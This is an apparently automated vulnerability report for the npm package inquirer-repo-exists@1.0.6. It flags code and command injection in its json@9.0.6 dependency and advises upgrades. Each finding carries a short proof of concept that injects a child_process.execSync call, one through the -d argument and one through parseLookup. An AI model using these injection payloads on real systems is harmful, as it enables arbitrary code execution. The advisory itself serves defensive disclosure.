inquirer-repo-exists@1.0.6

Vulnerabilities

2 via 2 paths

Dependencies

30

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 2
Status
  • 2
  • 0
  • 0

high severity

Arbitrary Code Injection

  • Vulnerable module: json
  • Introduced through: json@9.0.6

Detailed paths

  • Introduced through: inquirer-repo-exists@1.0.6 json@9.0.6
    Remediation: Upgrade to json@11.0.0.

Overview

json is a 'json' command tool for massaging and processing JSON on the command line.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the -d argument.

PoC

curl -sL 'https://api.github.com/repos/joyent/node/issues?state=open' | node_modules/json/lib/json.js -a created_at number title -d '""+require(`child_process`).execSync(`id`)//'

Remediation

Upgrade json to version 11.0.0 or higher.

References

high severity

Command Injection

  • Vulnerable module: json
  • Introduced through: json@9.0.6

Detailed paths

  • Introduced through: inquirer-repo-exists@1.0.6 json@9.0.6
    Remediation: Upgrade to json@10.0.0.

Overview

json is a 'json' command tool for massaging and processing JSON on the command line.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbritary commands using the parseLookup function.

PoC

const json = require('json');

res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]}');
console.log(res);

Remediation

Upgrade json to version 10.0.0 or higher.

References